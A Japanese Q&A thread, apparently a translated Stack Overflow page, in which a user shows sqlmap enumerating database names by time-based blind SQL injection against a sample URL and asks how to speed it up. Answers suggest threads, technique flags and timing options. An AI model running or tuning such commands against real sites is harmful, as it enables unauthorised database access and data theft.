4

これが例です。データベースを一覧表示しようとしています。

python sqlmap.py -u "http://somesite.com/?id=1" --dbs

[15:20:32] [INFO] fetching database names
[15:20:32] [INFO] fetching number of databases
[15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:20:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[15:20:55] [INFO] adjusting time delay to 2 seconds due to good response times
2
[15:20:58] [INFO] retrieved: 100_MYDB
[15:22:39] [INFO] retrieved: DEV_GC_DATASTORAGE
[15:26:15] [INFO] retrieved: GC_

タイムスタンプで、1つのデータベース名をリストするのに約3分かかり、文字ごとに表示され、各文字に約7秒かかることがわかります。私がyoutubeで見たチュートリアルは超高速です...これをスピードアップするために何ができますか?.confをいじってみました

ありがとう。

4

4 に答える 4

2

一部の最適化には-oスイッチを使用することもできます。--technique=BEUSも試してください

于 2013-01-12T07:48:24.077 に答える
1

somesite.comへのネットワーク遅延はどのくらいですか?これは、pingsomesite.comを実行するだけで確認できます。レイテンシーが高い場合、charごとにテストするため、ブラインドSQLインジェクションの実行は遅くなります。–rgerganov7月4日19:43

于 2012-07-18T20:38:16.300 に答える
1

より多くのスレッドを使用します。デフォルトは1です。

       --threads=THREADS
          Max number of concurrent HTTP(s) requests (default 1)
于 2016-09-21T08:49:34.590 に答える
-1

このように応答を速くすることができます。sqlmap -u " http://somesite.com/?id=1 " --time-sec 15

于 2017-07-11T18:39:37.523 に答える